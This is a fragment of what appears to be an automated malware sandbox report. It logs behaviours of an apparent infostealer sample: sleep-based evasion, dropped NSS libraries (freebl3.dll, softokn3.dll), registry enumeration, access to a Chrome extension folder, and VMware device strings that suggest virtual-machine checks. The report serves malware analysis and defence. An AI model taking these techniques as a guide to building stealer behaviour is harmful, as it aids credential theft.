Source: C:\Windows\explorer.exe TID: 5032 Thread sleep time: -31400s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 101248 Thread sleep count: 324 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 101256 Thread sleep count: 51 > 30 Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 644 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 352 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 4.4 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\SysWOW64\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: explorer.exe, 00000001.00000000.264778667.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000001.00000000.264895763.0000000007B66000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000001.00000000.265024888.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp<